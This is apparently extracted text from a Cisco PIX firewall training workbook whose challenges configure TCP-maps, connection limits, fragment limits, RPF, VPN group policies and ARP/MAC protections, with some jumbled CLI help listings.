http------tcp--80
ils-------tcp--389
netbios---udp--137-138
rsh-------tcp--514
sip-------tcp--5060
skinny----tcp--2000
sqlnet----tcp--1521
xdmcp-----udp--177
gtp-------udp--2123,3386
h323-ras--udp--1718-1719
icmp------icmp
mgcp------udp--2427,2727
rpc-------udp--111
rtsp------tcp--554
sip-------udp--5060
smtp------tcp--25
tftp------udp--69
dscp
Match IP DSCP (DiffServ CodePoints)
flow
Flow based Policy
port
Match TCP/UDP port(s)
precedence
Match IP precedence
rtp
Match RTP port numbers
tunnel-group
Match a Tunnel Group
pixfirewall(config-cmap)# match access-list ?
WORD Access List name
pixfirewall(config-cmap)# match access-list Columbia
pixfirewall(config-cmap)# exit
pixfirewall(config)# policy-map ptest
pixfirewall(config-pmap)# class ctest
pixfirewall(config-pmap-c)# ?
MPF policy-map class configuration commands:
exit
Exit from MPF class action configuration mode
help
Help for MPF policy-map configuration commands
inspect
Protocol inspection services
ips
Intrusion prevention services
no
police
Rate limit traffic for this class
priority Strict scheduling priority for this class
set
Set QoS values or connection values
<cr>
pixfirewall(config-pmap-c)# ips ?
mpf-policy-map-class mode commands/options:
inline
Inline mode IPS
promiscuous Promiscuous mode IPS
df-bit
Set IPsec DF policy
fragmentation
Set IPsec fragmentation policy
security-association Set security association lifetime
transform-set
Define transform and settings
pixfirewall(config-pmap-c)# ips promiscuous ?
fail-close Block traffic if IPS card fails
fail-open
Permit traffic if IPS card fails
pixfirewall(config-pmap-c)# ips promiscuous fail-close
pixfirewall(config-pmap-c)# exit
pixfirewall(config-pmap)# exit
pixfirewall(config)# service-policy ?
WORD Specify policy-map name
pixfirewall(config)# service-policy ANY ?
NetworkSims.com
543

global
Enter this keyword to specify a global policy
interface Enter this keyword to specify an interface policy
pixfirewall(config)# service-policy ptest global
In this case global is used to define all the interfaces in the PIX. Other alternatives are:
pixfirewall(config)# service-policy ptest interface inside
pixfirewall(config)# service-policy ptest interface outside
pixfirewall(config)# service-policy ptest interface inf2

Outline
This challenge involves defines a TCP-map.
Objectives
Define a TCP-map.
Example
pixfirewall(config)# tcp-map test
pixfirewall(config-tcp-map)# ?
TCP-map configuration commands:
check-retransmission
Check retransmit data, disabled by default
checksum-verification
Verify TCP checksum, disabled by default
default
exceed-mss
Packet that exceed the Maximum Segment Size set by
peer, default is to drop packet
no
reserved-bits
Reserved bits in TCP header are set, default is to
allow packet
syn-data
TCP SYN packets that contain data, default is to
allow packet
tcp-options
Options in TCP header
ttl-evasion-protection Protection against time to live (TTL) attacks,
enabled by default
urgent-flag
Urgent flag and urgent offset set, default is to
clear flag and offset
window-variation
Unexpected window size variation, default is to allow
connection
pixfirewall(config-tcp-map)# urgent-flag ?
tcp-map mode commands/options:
allow Allow packet with urgent flag and urgent offset
clear Clear urgent flag and urgent offset and allow packet
pixfirewall(config-tcp-map)# exit
NetworkSims.com
544
exit
help
match
no
rename
access-list
any
Match any packet
default-inspection-traffic Match default inspection
ctiqbe----tcp--2748
ftp-------tcp--21
h323-h225-tcp--1720
http------tcp--80
ils-------tcp--389
rsh-------tcp--514
sip-------tcp--5060
skinny----tcp--2000
sqlnet----tcp--1521
xdmcp-----udp--177
dscp
flow
port
precedence
rtp
tunnel-group
traffic:
dns-------udp--53
gtp-------udp--2123,3386
h323-ras--udp--1718-1719
icmp------icmp
mgcp------udp--2427,2727
rpc-------udp--111
rtsp------tcp--554
sip-------udp--5060
smtp------tcp--25
tftp------udp--69

Flow based Policy
Match IP precedence
pixfirewall(config-cmap)# match port ?

tcp This keyword specifies TCP port(s)
udp This keyword specifies UDP port(s)
pixfirewall(config-cmap)# match port tcp ?
eq
Port equal to operator
range Port range operator
pixfirewall(config-cmap)# match port tcp range ?
<0-65535>
aol
bgp
chargen
cifs
citrix-ica
cmd
ctiqbe
daytime
discard
domain
echo
exec
NetworkSims.com
545
finger
ftp
ftp-data
gopher
h323
hostname
http
https
ident
imap4
irc
kerberos
klogin
kshell
ldap
ldaps
login
lotusnotes
lpd
netbios-ssn
nntp
pcanywhere-data
pim-auto-rp
pop2
pop3
pptp
rsh
rtsp
sip
smtp
sqlnet
ssh
sunrpc
tacacs
talk
telnet
uucp
whois
www
pixfirewall(config-cmap)# match port tcp range ftp-data ?
<0-65535>
aol
bgp
chargen
cifs
citrix-ica
cmd
ctiqbe
daytime
discard
domain
echo
exec
finger
ftp
ftp-data
gopher
h323
hostname
http
NetworkSims.com
546
https
ident
imap4
irc
kerberos
klogin
kshell
ldap
ldaps
login
lotusnotes
lpd
netbios-ssn
nntp
pcanywhere-data
pim-auto-rp
pop2
pop3
pptp
rsh
rtsp
sip
smtp
sqlnet
ssh
sunrpc
tacacs
talk
telnet
uucp
whois
www
pixfirewall(config-cmap)# match port tcp range ftp-data www
pixfirewall(config-cmap)# policy-map testing
pixfirewall(config-pmap-c)# set ?
connection Configure connection parameters
password-recovery Password recovery configuration
resetinbound
Send reset to a denied inbound TCP packet
resetoutside
Send reset to a denied TCP packet to outside interface
pixfirewall(config-pmap-c)# set connection ?
advanced-options
Configure advanced connection parameters
conn-max
Keyword to set the maximum number of all simultaneous
connections that are allowed. Default is 0 which
means unlimited connections.
embryonic-conn-max
Keyword to set the maximum number of TCP embryonic
random-sequence-number Enable/disable TCP sequence number randomization.
Default is to enable TCP sequence number
randomization
timeout
Configure connection timeout parameters
pixfirewall(config-pmap-c)# set connection advanced-options ?
WORD Enter TCP map name
NetworkSims.com
547
pixfirewall(config-pmap-c)# set connection advanced-options test

pixfirewall(config)# service-policy testing ?
global
pixfirewall(config)# service-policy testing global

Outline
This challenge involves defines an embryonic TCP connection timeout.
Objectives
Define an embryonic TCP connection timeout.
Example
exit
help
match
no
rename
access-list
any
Match any packet
ctiqbe----tcp--2748
ftp-------tcp--21
h323-h225-tcp--1720
http------tcp--80
ils-------tcp--389
rsh-------tcp--514
sip-------tcp--5060
skinny----tcp--2000
NetworkSims.com
traffic:
dns-------udp--53
gtp-------udp--2123,3386
h323-ras--udp--1718-1719
icmp------icmp
mgcp------udp--2427,2727
rpc-------udp--111
rtsp------tcp--554
sip-------udp--5060
smtp------tcp--25
548
sqlnet----tcp--1521
xdmcp-----udp--177
tftp------udp--69
dscp
flow
Flow based Policy
port
precedence
Match IP precedence
rtp
tunnel-group
pixfirewall(config-pmap-c)# ?
MPF policy-map class configuration commands:
exit
Exit from MPF class action configuration mode
help
Help for MPF policy-map configuration commands
inspect
Protocol inspection services
ips
Intrusion prevention services
no
police
Rate limit traffic for this class
priority Strict scheduling priority for this class
set
Set QoS values or connection values
<cr>
resetinbound
resetoutside
advanced-options
conn-max
embryonic-conn-max
randomization
timeout
pixfirewall(config-pmap-c)# set connection timeout ?
embryonic
Configure absolute time after which an embryonic TCP connection
will be closed, default is 0:00:30.
half-closed Configure idle time after which a TCP half-closed connection
will be freed, default is 0:10:00
tcp
Configure idle time after which a TCP connection state will be
closed, default is 1:00:00
pixfirewall(config-pmap-c)# set connection timeout embryonic ?
NetworkSims.com
549

0:0:0 | <0:5:0> - <1192:59:59> Idle time after which a TCP connection state
will be closed, default is 1:00:00. Specify
0:0:0 to never time out
<0-0>
Specify this value to never time out
pixfirewall(config-pmap-c)# set connection timeout embryonic 0:00:10
pixfirewall(config)# service-policy ptest?
global
In this case global is used to define all the interfaces in the PIX. Other alternatives are:
pixfirewall(config)# service-policy ptest interface inside
pixfirewall(config)# service-policy ptest interface inf2

Outline
This challenge involves defines the maximum number of embryonic TCP connections.
Objectives
Define maximum number of embryonic TCP connections.
Example
NetworkSims.com
550

resetinbound
resetoutside
advanced-options
conn-max
embryonic-conn-max
randomization
timeout
pixfirewall(config-pmap-c)# set connection embryonic-conn-max ?
<0-65535> Enter the maximum number for all simultaneous connections
pixfirewall(config-pmap-c)# set connection embryonic-conn-max 2
In this case the TCP Intercept is used to proxy connections after the second one, thus the PIX
firewall will send the SYN, ACK reply to a SYN request.

Outline
This challenge involves the PIX check TCP checksums.
Objectives
Define a TCP-map.
Define that checksums must be verified.
Example
pixfirewall(config)# tcp-map TEST
default
NetworkSims.com
551
exceed-mss

no
reserved-bits
allow packet
syn-data
allow packet
tcp-options
enabled by default
urgent-flag
window-variation
connection
pixfirewall(config-tcp-map)# checksum-verification
pixfirewall(config-cmap)# match access-list test
pixfirewall(config)# policy-map testing
pixfirewall(config-pmap-c)# set connection advanced-options TEST
In this case the checksum of all TCP segments will be checked. If they are incorrect, as in the
case of spoofed data packets, they will be dropped. This, though, will have a performance
impact on the firewall, and should be checked for its performance. The access-list:
allow for all the traffic to be checked.

Outline
This challenge involves the PIX checks the maximum segment size for TCP details.
Objectives
Define a TCP-map.
Define that Exceeded-MSS is allowed or not.
Example
NetworkSims.com
552
default
exceed-mss
no
reserved-bits
allow packet
syn-data
allow packet
tcp-options
enabled by default
urgent-flag
window-variation
connection
pixfirewall(config-tcp-map)# exceed-mss ?
allow Allow packet that exceed the Maximum Segment Size
drop
Drop packet that exceed the Maximum Segment Size
pixfirewall(config-tcp-map)# exceed-mss allow

Outline
This challenge involves the preventing inconsistent TCP re-transmissions.
Objectives
Define a TCP-map.
Check for TCP re-transmissions.
Example
NetworkSims.com
553
default
exceed-mss
no
reserved-bits
allow packet
syn-data
allow packet
tcp-options
enabled by default
urgent-flag
window-variation
connection
pixfirewall(config-tcp-map)# check-retransmission

Outline
This challenge involves the setting the limit for out-of-sequence TCP segments.
Objectives
Define a TCP-map.
Define the limit for the TCP queue.
Example
default
NetworkSims.com
554
exceed-mss

no
reserved-bits
allow packet
syn-data
allow packet
tcp-options
enabled by default
urgent-flag
window-variation
connection
pixfirewall(config-tcp-map)# queue-limit 64

Outline
This challenge involves checking the TCP reserved bits.
Objectives
Define a TCP-map.
Define the action of reserved bits.
Example
default
exceed-mss
no
reserved-bits
allow packet
syn-data
NetworkSims.com
555
allow packet
Protection against time to live (TTL) attacks,
enabled by default
urgent-flag
window-variation
connection
pixfirewall(config-tcp-map)# reserved-bit ?
tcp-options
ttl-evasion-protection

allow Allow packets with reserved bits in TCP header
clear Clear reserved bits in TCP header and allow packet
drop
Drop packet with reserved bits set
threshold Configure remote-access thresholds
pixfirewall(config-tcp-map)# reserved-bit allow

Outline
This challenge involves checking if the SYN flag appears with Data.
Objectives
Define a TCP-map.
Define the action of SYN-Data.
Example
default
exceed-mss
no
NetworkSims.com
556
reserved-bits

allow packet
syn-data
allow packet
tcp-options
enabled by default
urgent-flag
window-variation
connection
pixfirewall(config-tcp-map)# syn-data ?
allow Allow SYN packets that contain data
drop
Drop SYN packets that contain data
connection Configure sysopt connection settings
nodnsalias Disable DNS A record translation
noproxyarp Disable proxy ARP
radius
Ignore secret in RADIUS accounting responses
uauth
Allow web browsers to supply a cached username and password for
AAA authentication
pixfirewall(config-tcp-map)# syn-data drop

Outline
This challenge involves disabling TTL evasion protection.
Objectives
Define a TCP-map.
Disable TTL evasion protection.
Example
NetworkSims.com
557

default
exceed-mss
no
reserved-bits
allow packet
syn-data
allow packet
tcp-options
enabled by default
urgent-flag
window-variation
connection
pixfirewall(config-tcp-map)# ttl-evasion-protection
With TTL evasion, an attacker can send a packet to the firewall with a small TTL (Time-toLive). Once it goes to zero, somewhere between the firewall and the host, the packet is
dropped. The attacker can then send more packets with high TTLs which will get through.
The rebuilt segments could then contain malicious information, which would not be
detected by IDSs or the firewalls.

Outline
This challenge involves allowing or denying TCP Window variations in TCP connections.
Objectives
Define a TCP-map.
Disable/enable TCP Window variations.
Example
NetworkSims.com
558
default
exceed-mss
no
reserved-bits
allow packet
syn-data
allow packet
tcp-options
enabled by default
urgent-flag
window-variation
connection
pixfirewall(config-tcp-map)# window-variation ?
allow-connection Allow connection with unexpected window size variation
drop-connection
Drop connection with unexpected window size variation
pixfirewall(config-tcp-map)# window-variation drop
With TTL evasion, an attacker can send a packet to the firewall with a small TTL (Time-toLive). Once it goes to zero, somewhere between the firewall and the host, the packet is
dropped. The attacker can then send more packets with high TTLs which will get through.
The rebuilt segments could then contain malicious information, which would not be
detected by IDSs or the firewalls.

Outline
This challenge involves preventing IP spoofing by enabling Unicast Reverse Path
Forwarding (Unicast RPF) which ensures that all of the packets have a source IP address
which matches the correct source interface according to the routing table.
Objectives
NetworkSims.com
559
Enable Unicast RPF.
Example
pixfirewall(config-if)# ip address 192.168.0.1 255.255.255.0
pixfirewall(config-if)# nameif test1
pixfirewall(config)# ip ?
audit
local
Define a local pool of IP addresses
verify Configure Unicast Reverse Path Filtering on an interface
pixfirewall(config)# ip verify ?
reverse-path Keyword to indicate Reverse-Path Filtering
pixfirewall(config)# ip verify reverse-path ?
interface Keyword to apply RPF on an interface
pixfirewall(config)# ip verify reverse-path interface ?
test3
test2
test1
pixfirewall(config)# ip verify reverse-path interface test1

Outline
This challenge involves defining the fragments per IP packet. Normally this is set at a
maximum of 24 fragments per IP packet, with, up to, 200 fragments awaiting reassembly.
Fragmented packets can be used in a DoS attack. This challenge restricts the number of
fragments.
NetworkSims.com
560
Objectives
Define maximum fragments per packet (using the fragment chain command)
Define the maximum number of awaiting fragments (using the fragment size
command).
Define the timeout for all the parts of a packet to arrive (using the fragment timeout
command).
Example
pixfirewall(config)# fragment ?
chain
Configure maximum number of elements in a fragment set
size
Configure maximum number of blocks in database
timeout Configure number of seconds to assemble a fragment set
pixfirewall(config)# fragment chain ?
<1-8200> Maximum number of elements in a fragment set, default is 24
pixfirewall(config)# fragment chain 1 ?
Test3
Test2
Test1
<cr>
pixfirewall(config)# fragment chain 1 test3
pixfirewall(config)# fragment size ?
<1-30000> Maximum number of blocks in database, default is 200
pixfirewall(config)# fragment size 10 test1
pixfirewall(config)# fragment timeout ?
NetworkSims.com
561
<1-30>
Number of seconds to assemble a fragment set, default is 5
pixfirewall(config)# fragment timeout 10 test1
The fragment chain command is used to define the fragments per packet, while the
fragment size command defines the maximum number of fragments that await assembly.
Also the fragment timeout command is used to limit the time for all parts of a packet to
arrive.
The command:
(config)# fragment chain 500
Would define the fragments per packet on all interfaces, while:
(config)# fragment chain 500 outside
would define it for the outside interface.

Outline
This challenge involves defining a VLAN on a subinterface. It is not possible to assign a
VLAN to a subinterface and not to a physical interface.
Objectives
Define a VLAN on a sub-interface.

Enable the sub-interface
Example
pixfirewall(config)# int e0.1
pixfirewall(config-subif)# ?
default
description
exit
help
Interactive help for interface subcommands
igmp
ip
Configure ip addresses.
ipv6
IPv6 interface subcommands
management-only Dedicate an interface to management. Block thru traffic
NetworkSims.com
562
nameif
no
ospf
pim
security-level

Configure interface specific OSPF parameters
Specify the security level of this interface after this
keyword, Eg: 0, 100 etc. The relative security level between
two interfaces determines the way the Adaptive Security
Algorithm is applied. A lower security_level interface is
outside relative to a higher level interface and equivalent
interfaces are outside to each other
shutdown
vlan
Configure VLAN identifier
pixfirewall(config-subif)# vl ?
subinterface mode commands/options:
<1-4094> IEEE 802.1Q VLAN Identifier
pixfirewall(config-subif)# vlan 2
pixfirewall(config-subif)# no shutdown
pixfirewall(config-subif)# exit

Outline
This challenge involves defining the attributes for the group-policy.
Objectives
Define a group-policy attribute.

Define attributes.
Define a tunnel-group.
Define IPSec attributes.
Example
pixfirewall(config)# group-policy ?
WORD < 65 char Enter the name of the group policy
pixfirewall(config)# group-policy test ?
attributes Enter the attributes sub-command mode
NetworkSims.com
563
external
Enter this keyword to specify an external group policy
internal
Enter this keyword to specify an internal group policy
pixfirewall(config)# group-policy test attributes
pixfirewall(config-group-policy)# ?
group_policy configuration commands:
backup-servers
Configure list of backup servers to be used
by the remote client
banner
Configure a banner, or welcome text to be
displayed on the VPN remote client
client-access-rule
Specify rules permitting/denying access to
specific client types and versions.
client-firewall
Configure the firewall requirements for
users in this group-policy
default-domain
Configure default domain name given to
users of this group
dhcp-network-scope
Specify the range of IP addresses to
indicate to the DHCP server for address
assignment
dns-server
Configure the primary and secondary DNS
servers
exit
Exit from group-policy configuration mode
group-lock
Enter name of an existing tunnel-group that
users are required to connect with
help
Help for group_policy configuration
commands
ip-comp
Enter this command to enable IP
compression(LZS)
ip-phone-bypass
Configure to allow Cisco IP phones behind
Hardware clients to bypass the Individual
User Authentication process.
ipsec-udp
Enter this command to allow a client to
operate through a NAT device using UDP
encapsulation
ipsec-udp-port
Enter the UDP port to be used by the client
for IPSec through NAT
leap-bypass
Enable/disable LEAP packets from Cisco
wireless devices to bypass the individual
user authentication process. This setting
applies only to HW clients.
nem
Configure hardware clients to use network
extension mode. This setting applies only
to HW clients.
no
Remove an attribute value pair
password-storage
Enable/disable storage of the login
password on the client system
pfs
Enter this command to indicate that the
remote client needs to perform PFS
re-xauth
Enter this command to enable
reauthentication of the user on IKE rekey
secure-unit-authentication
Configure interactive authentication. This
setting applies only to HW clients.
split-dns
Configure list of domains to be resolved
through the Split Tunnel
split-tunnel-network-list
Configure name of access-list for split
tunnel configuration
split-tunnel-policy
Select the split tunneling method to be
used by the remote client
user-authentication
Configure individual user authentication.
This setting applies only to HW clients.
user-authentication-idle-timeout Configure the idle timeout period in
minutes. If there is no communication in
this period, the system terminates the
NetworkSims.com
564
vpn-access-hours
vpn-filter
vpn-idle-timeout
vpn-session-timeout
vpn-simultaneous-logins
vpn-tunnel-protocol
wins-server
connection. This setting applies only to HW

clients.
Enter name of a configured time-range
policy
Enter name of a configured ACL to apply to
users
Enter idle timeout period in minutes, enter
none to disable
Enter maximum user connection time in
minutes, enter none for unlimited time
Enter maximum number of simultaneous logins
allowed
Enter permitted tunneling protocols
Configure the primary and secondary WINS
servers
pixfirewall(config-group-policy)# banner none

group-policy mode commands/options:
none
Specify that no banner text will be displayed on the VPN remote client
value Specify the banner or welcome text to be displayed on the VPN remote
client
pixfirewall(config-group-policy)# banner none
pixfirewall(config-group-policy)# vpn-simultaneous-logins ?
<0-2147483647> Maximum number of simultaneous logins allowed, enter 0 to
disable login and prevent user access
pixfirewall(config-group-policy)# vpn-simultaneous-logins 10
pixfirewall(config-group-policy)# vpn-idle ?
<1-35791394> Number of minutes
none
Disable timeout and allow an unlimited idle period
pixfirewall(config-group-policy)# vpn-idle 10
pixfirewall(config-group-policy)# vpn-tunnel ?
IPSec IP Security Protocol
pixfirewall(config-group-policy)# vpn-tunnel ipsec
pixfirewall(config-group-policy)# wins-server ?
none
No wins-server will be specified and disable inheritance
value Specify the primary and secondary WINS servers
pixfirewall(config-group-policy)# wins-server 10
pixfirewall(config-group-policy)# dhcp-server ?
A.B.C.D The IP sub-network that the DHCP server should assign to users in
this group
none
No range of IP addresses will be specified and disable inheritance
pixfirewall(config-group-policy)# dhcp-server 10
pixfirewall(config-group-policy)# exit
pixfirewall# sh running
pixfirewall# config t
NetworkSims.com
565
pixfirewall(config)# tunnel-group test type ?

ipsec-l2l IPSec Site to Site group
ipsec-ra
IPSec Remote Access group
pixfirewall(config)# tunnel-group test type ipsec-ra
pixfirewall(config)# tunnel-group test ?
general-attributes Enter the general-attributes sub command mode
ipsec-attributes
Enter the ipsec-attributes sub command mode
type
Enter the type of this group-policy
pixfirewall(config)# tunnel-group test general-attributes
pixfirewall(config-general)# ?
accounting-server-group
Enter name of the accounting server group
address-pool
Enter a list of address pools to assign
addresses from
authentication-server-group Enter name of the authentication server group
authorization-server-group
Enter name of the authorization server group
default-group-policy
Enter name of the default group policy
dhcp-server
Enter IP address or name of the DHCP server
exit
Exit from tunnel-group general attribute
configuration mode
help
Help for tunnel group configuration commands
no
strip-group
Enable strip-group processing
strip-realm
Enable strip-realm processing
pixfirewall(config-general)# exit
pixfirewall(config)# tunnel-g test ?

ipsec-attributes
type
pixfirewall(config)# tunnel-group test ipsec-attributes
pixfirewall(config-ipsec)# ?
authorization-dn-attributes The DN of the peer certificate used as username
for authorization
authorization-required
Require users to authorize successfully in order
to connect
chain
Enable sending certificate chain
client-update
Configure and change client update parameters
exit
Exit from tunnel-group IPSec attribute
configuration mode
help
isakmp
Configure ISAKMP policy
no
peer-id-validate
Validate identity of the peer using the peer's
certificate
pre-shared-key
Associate a pre-shared key with the connection
policy
radius-with-expiry
Enable negotiation of password update during
RADIUS authentication
trust-point
Enter name of the trustpoint that identifies the
certificate to be sent to the IKE peer
NetworkSims.com
566

Outline
This challenge involves defining that each of the ports has the same security level, so that all
the ports can communicate with each other. Also the test recaps TELNET, SSH and HTTP
details.
Objectives
Define the details of the ports

Apply the same security level.
Generate RSA keys.
Define TELNET, SSH and HTTP details.
Example
# config t
(config)# int e0
(config-if)# nameif ?
WORD < 49 char A name by which this interface will be referred in all other
Commands
(config-if)# nameif out
(config-if)# security ?
<0-100> Security level for the interface
(config-if)# security 0
(config-if)# exit
(config)# int e1
(config-if)# nameif in
(config-if)# exit
(config)# same-security-traffic ?
permit Keyword for enabling this functionality
(config)# same-security-traffic permit ?
inter-interface Permit communication between different interfaces with the
same security level
intra-interface Permit communication between VPN peers connected to the same
NetworkSims.com
567
interface
(config)# same-security-traffic permit inter-interface
(config)# cry key ?
generate Generate new keys
zeroize
Remove keys
(config)# crypto key generate ?
dsa Generate DSA keys
rsa Generate RSA keys
(config)# crypto key generate rsa ?
general-keys Generate a general purpose RSA key pair for signing and
encryption
label
Provide a label
modulus
Provide number of modulus bits on the command line
noconfirm
Specify this keyword to suppress all interactive prompting.
usage-keys
Generate seperate RSA key pairs for signing and encryption
<cr>
(config)# crypto key generate rsa modulus ?
1024 1024 bits
2048 2048 bits
512
512 bits
768
768 bits
(config)# crypto key generate rsa modulus 1024
(config)# telnet 204.134.17.7 255.255.192.0 inside
(config)# telnet 201.13.14.2 255.255.240.0 outside
(config)# telnet 210.1.170.5 255.255.224.0 inf2
(config)# telnet timeout 10
(config)# show telnet
(config)# show telnet timeout
(config)# ssh 204.134.17.7 255.255.192.0 inside
(config)# ssh timeout 10
(config)# http 204.134.17.7 255.255.192.0 inside
(config)# http 201.13.14.2 255.255.240.0 outside

Outline
This challenge involves defining the default route for traffic for both tunneled and nontunneled traffic.
Objectives
Define interface details.
NetworkSims.com
568
Define default routes.
Example
# config t
(config)# int e0
Commands
(config-if)# nameif edinburgh
(config-if)# exit
(config)# exit
(config)# route ?
Inside
Edinburgh Name of interface Ethernet0
(config)# route Edinburgh ?
Hostname or A.B.C.D The foreign network for this route, 0 means default
(config)# route Edinburgh 0 ?
(config)# route Edinburgh 0 0 ?
is reached.
(config)# route Edinburgh 0 0 192.168.0.2
(config)# route Edinburgh 0 0 192.168.0.3 ?
<1-255>
to 255
<cr>
(config)# route Edinburgh 0 0 192.168.0.3 tunneled

Outline
This challenge involves defining PIM to maintain forwarding tables for forwarding
multicast diagrams.
Objectives
NetworkSims.com
569

Define PIM details.
Example
# config t
(config)# int e0
Commands
(config-if)# nameif Edinburgh
(config-if)# pim ?
dr-priority
PIM Hello DR priority
hello-interval
PIM neighbor Hello announcement interval
join-prune-interval PIM periodic Join-Prune announcement interval
<cr>
accept-register
Register accept filter
old-register-checksum Generate registers compatible with older IOS versions
rp-address
Configure Sparse-Mode Rendezvous Point
spt-threshold
Configure threshold for SPT switchover on last-hop
(config-if)# pim
(config-if)# pim dr-priority ?
<0-4294967295> Hello DR priority, preference given to larger value
(config-if)# pim dr-priority 50
(config-if)# pim hello-interval ?
<1-3600> Hello interval in seconds
(config-if)# pim hello-interval 50
(config-if)# pi join-prune-interval ?
<10-600> Join-Prune interval in seconds
(config-if)# pi join-prune-interval 50
(config-if)# exit
(config)# pim ?
accept-register
rp-address
spt-threshold
NetworkSims.com
570
(config)# pim accept-register ?

list
Access list
route-map Route-map
(config)# pim old-register-checksum ?
<cr>
Hostname or A.B.C.D
Hostname or X:X:X:X::X Ping destination IPv6 address or hostname
<cr>
(config)# pim rp-address ?
Hostname or A.B.C.D IP name or address of Rendezvous Point
(config)# pim rp-address 192.168.0.1
(config)# pim spt-threshold ?
infinity Always stay on shared-tree

Outline
This challenge involves defining DHCP relay, where DHCP requests can be forwarded to a
certain interface.
Objectives

Define DHCP relay details.
Example
# config t
(config)# int e0
(config-if)# exit
(config)# dhcprelay ?
enable
Start a DHCP server task on an interface, but at least one
dhcpdrelay server must be configured before enable is issued
server
Configure dhcprelay server information
NetworkSims.com
571
setroute
Configure the DHCP Relay Agent to change the first default

router address (in the packet sent from the DHCP server) to
the address of the client interface
timeout
Configure timeout, the number of seconds for relay address
negotiation after this keyword
(config)# dhcprelay server ?
Hostname or A.B.C.D IP address of dhcprelay server to which
requests are forwarded
(config)# dhcprelay server 192.168.1.2
(config)# dhcprelay setroute ?
Available client interface names:
Inf2
Inside
(config)# dhcprelay enable ?
Available interfaces on which relay agent will accept client requests:
Inf2
Inside
(config)# dhcprelay enable Edinburgh
(config)# dhcprelay timeout ?
<1-3600> Enter number of seconds for relay address negotiation, default
is 60 seconds
<cr>
(config)# dhcprelay timeout 10

Outline
This challenge involves defining the transparent firewall mode, and to enable EtherType
access filtering.
Objectives
Define a transparent firewall.

Define EtherType filtering.
Example
# config t
pixfirewall(config)# firewall ?
NetworkSims.com
572

transparent Switch to transparent mode
(config)# firewall transparent
Switched to transparent mode
(config)# access-list ?
WORD < 241 char Access list identifier
alert-interval
Specify the alert interval for generating syslog message
106001 which alerts that the system has reached a deny
flow maximum. If not specified, the default value is 300 sec
deny-flow-max
Specify the maximum number of concurrent deny flows that can
be created. If not specified, the default value is 4096
(config)# access-list TEST ?
deny
ethertype Configure access policy for non IP traffic through the
system when configured in transparent mode
extended
Configure access policy for IP traffic through the system
line
Use this to specify line number at which ACE should be entered
permit
remark
Specify a comment (remark) for the access-list after this
keyword
standard
Use this to configure policy having destination host or network
only
(config)# access-list TEST ethertype ?
configure
deny
permit
(config)#
access-list TEST ethertype deny ?

bpdu
ipx
mpls-unicast
mpls-multicast
any
<0x600-0xffff> Specify ethertype value
(config)# access-list TEST ethertype deny ipx
(config)# access-list TEST ethertype deny bpdu
pixfirewall(config)# access-group TEST ?
in
For input traffic
out For output traffic
pixfirewall(config)# access-group TEST in ?
interface Keyword to specify an interface
pixfirewall(config)# access-group TEST in interface ?
Inf2
inside
outside
NetworkSims.com
573
(config)# access-group TEST in interface outside

(config)# access-group TEST in interface inside

Outline
This challenge involves automated updates for the firewall, and enabling ARP inspection.
ARP inspect helps to overcome the ARP spoofing, where an intruder can respond to a
request for a gateway address with their own address, and thus route packets through the
intruders system. This is known as a man-in-the-middle attack, where the intruder would
route the data out of the main gateway. For this to work the firewall must contain an ARP
entry for each host on the network.
NOTE: A transport firewall does not route data, and does thus not have IP addresses on its
ports. It can have one IP address, but this is used only for management purposes.
Objectives
Define auto-update parameters.

Define an static ARP entry.
Enable ARP inspection.
Example
# config t
pixfirewall(config)# auto-update ?
device-id
Specify the device ID reported to the Auto Update Server
poll-period Specify how often to poll the Auto Update Server
server
Specify the URL of the Auto Update Server
timeout
Specify maximum wait to contact the Auto Update Server
pixfirewall(config)# auto-update device-id ?
hardware-serial Hardware serial number
hostname
Host name
ipaddress
IP address of the specified interface
mac-address
MAC address of the specified interface
string
Text string
pixfirewall(config)# auto-update device-id hostname
pixfirewall(config)# auto-update poll-period ?
<1-35791> Period in minutes between poll updates
pixfirewall(config)# auto-update poll-period 10
pixfirewall(config)# auto-update server ?
NetworkSims.com
574

WORD < 450 char URL of the auto update server
pixfirewall(config)# auto-update server http://user:password@1.2.3.4:8080/update ?
verify-certificate Verify the Auto Update Server certificate
<cr>
pixfirewall(config)# auto-update server http://user:password@1.2.3.4:8080/update
pixfirewall(config)# auto-update timeout ?
<1-35791> Timeout in minutes to contact server
pixfirewall(config)# auto-update timeout 10
pixfirewall(config)# firewall transparent
pixfirewall(config)# ip address 1.2.3.4 255.255.255.0
pixfirewall(config)# arp-inspection ?
Inf2
Inside
Outside
pixfirewall(config)# arp-inspection outside ?
enable Enable arp inspection
pixfirewall(config)# arp-inspection outside enable ?
flood
Flood arp requests
no-flood Do not flood arp requests
<cr>
pixfirewall(config)# arp-inspection outside enable no-flood
pixfirewall(config)# arp ?
timeout Configure ARP timeout value
inside
outside Name of interface Ethernet0
pixfirewall(config)# arp inside ?
Hostname or A.B.C.D IP address for an ARP table entry
pixfirewall(config)# arp inside 1.2.3.4 ?
H.H.H Hardware MAC address
pixfirewall(config)# arp inside 1.2.3.4 1.1.1 ?
alias Don't expire this ARP entry after timeout
<cr>
NetworkSims.com
575
pixfirewall(config)# mac-address-table ?
aging-time Configure duration that a bridge entry will remain in the table,
default is 5 minutes
static
Add static entries to the table
pixfirewall(config)# mac-address-table aging-time ?
<5-720> Aging interval in minutes
pixfirewall(config)# mac-address-table aging-time 10
pixfirewall(config)# mac-address-table static ?
$E2.NAME$\tName of interface Ethernet2
pixfirewall(config)# mac-address-table static 1.1.1 ?
H.H.H MAC address
pixfirewall(config)# mac-address-table static 1.1.1 0.0.0 ?
<cr>

Outline
In most applications, the firewall keeps a table of the known MAC addresses on each of its
interfaces. It uses this to route packets to the correct node on the network. In order to guard
against MAC address spoofing, automatically learning of MAC addresses can be switched
off, and MAC addresses can be statically added, for all valid nodes.
NOTE: A transport firewall does not route data, and does thus not have IP addresses on its
ports. It can have one IP address, but this is used only for management purposes.
Objectives
Define MAC addresses of the MAC address table.

Disable MAC address learning.
Example
NetworkSims.com
576
# config t
pixfirewall(config)# firewall transparent
pixfirewall(config)# ip address 1.2.3.4 255.255.255.0
pixfirewall(config)# mac-address-table ?
aging-time Configure duration that a bridge entry will remain in the table,
default is 5 minutes
static
Add static entries to the table
pixfirewall(config)# mac-address-table a ?
<5-720> Aging interval in minutes
pixfirewall(config)# mac-address-table static ?
Inf2
Inside
Outside
pixfirewall(config)# mac-address-table static outside ?
H.H.H MAC address
pixfirewall(config)# mac-address-table static outside 1.1.1
pixfirewall(config)# mac-learn ?
Inf2
Inside
Outside
pixfirewall(config)# mac-learn outside ?
disable Disable mac learning on the interface
pixfirewall(config)# mac-learn outside disable

Outline
